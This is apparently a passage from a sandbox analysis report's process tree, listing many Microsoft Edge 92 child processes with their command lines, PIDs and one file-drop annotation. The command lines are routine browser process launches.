5⤵
PID:4840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
5⤵
PID:2008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 /prefetch:3
5⤵
PID:4236

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
5⤵
PID:2096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
5⤵
PID:4632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
5⤵
PID:2852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:1
5⤵
PID:4292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
5⤵
PID:1560

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
5⤵
PID:5184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
5⤵
PID:5192

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
5⤵
PID:5360

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
5⤵
- Drops file in Program Files directory
PID:5368

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1bc,0x22c,0x7ff735615460,0x7ff735615470,0x7ff735615480
6⤵
PID:5448

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:8
5⤵
PID:5680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
5⤵
PID:5688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
5⤵
PID:5708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
5⤵
PID:5292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
5⤵
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
5⤵
PID:4424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:1
5⤵
PID:5128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
5⤵
PID:1872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:1
5⤵
PID:5036

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6120 /prefetch:2
5⤵
PID:748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
5⤵
PID:5176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
5⤵
PID:5340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
5⤵
PID:4584

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
5⤵
PID:624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
5⤵
PID:6080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6856 /prefetch:1
5⤵
PID:6060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6656 /prefetch:1
5⤵
PID:5308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7080 /prefetch:1
5⤵
PID:4144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
5⤵
PID:5880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7284 /prefetch:1
5⤵
PID:4440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
5⤵
PID:5356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3928 /prefetch:1
5⤵
PID:5240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7368 /prefetch:1
5⤵
PID:6064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1
5⤵
PID:4604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1
5⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1
5⤵
PID:5416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
5⤵
PID:2032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8024 /prefetch:1
5⤵
PID:3808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7852 /prefetch:1
5⤵
PID:5396

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
5⤵
PID:1760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6872 /prefetch:1
5⤵
PID:4280

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8092 /prefetch:1
5⤵
PID:4980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1
5⤵
PID:3112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8544 /prefetch:1
5⤵
PID:2216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:1
5⤵
PID:5868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
5⤵
PID:3528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:1
5⤵
PID:3508

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9208 /prefetch:1
5⤵
PID:1360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:1
5⤵
PID:3840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9396 /prefetch:1
5⤵
PID:4380

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:1
5⤵
PID:536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10480 /prefetch:1
5⤵
PID:6472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9836 /prefetch:1
5⤵
PID:6828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10084 /prefetch:1
5⤵
PID:6904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10188 /prefetch:1
5⤵
PID:6640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:1
5⤵
PID:6300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8624 /prefetch:1
5⤵
PID:6612

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10784 /prefetch:1
5⤵
PID:7072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8608 /prefetch:1
5⤵
PID:7132

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11252 /prefetch:1
5⤵
PID:2892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,12496557060019419454,11471779789792218260,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11112 /prefetch:1
5⤵
PID:5052

